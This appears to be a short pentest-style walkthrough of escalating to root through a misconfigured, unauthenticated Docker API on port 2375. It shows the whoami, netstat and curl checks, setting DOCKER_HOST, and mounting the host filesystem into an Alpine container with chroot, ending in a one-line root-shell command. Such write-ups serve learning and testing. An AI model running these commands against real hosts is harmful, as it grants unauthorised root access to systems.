Docker - Escalation of privilege - Misconfigured Docker Socket

  • Escalation


Who I am:

whoami
john

 

List all processes listening on TCP ports

netstat -tlp
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 localhost:2375          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      -                   
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN      -           

 

  • Port 2375: Docker API unencrypted
  • Port 2376: Docker API encrypted

 

Check if port 2375 is connected to Docker:

curl localhost:2375/version
{"Platform":{"Name":"Docker Engine - Community"},
...

The Docker client is installed on the machine and uses the default port 2375. Now let's configure the Docker client to use TCP.

 

export DOCKER_HOST="tcp://localhost:2375"

 

https://docs.docker.com/engine/reference/commandline/cli/#environment-variables

 

Start a Container and mount the root of the host machine on a directory of the Container.

docker run -it -v /:/mnt alpine bash

Once inside the container:

 

chroot /mnt bash

 

Who I am:

whoami
root

 

In one line:

docker run -it --rm -v /:/mnt alpine chroot /mnt bash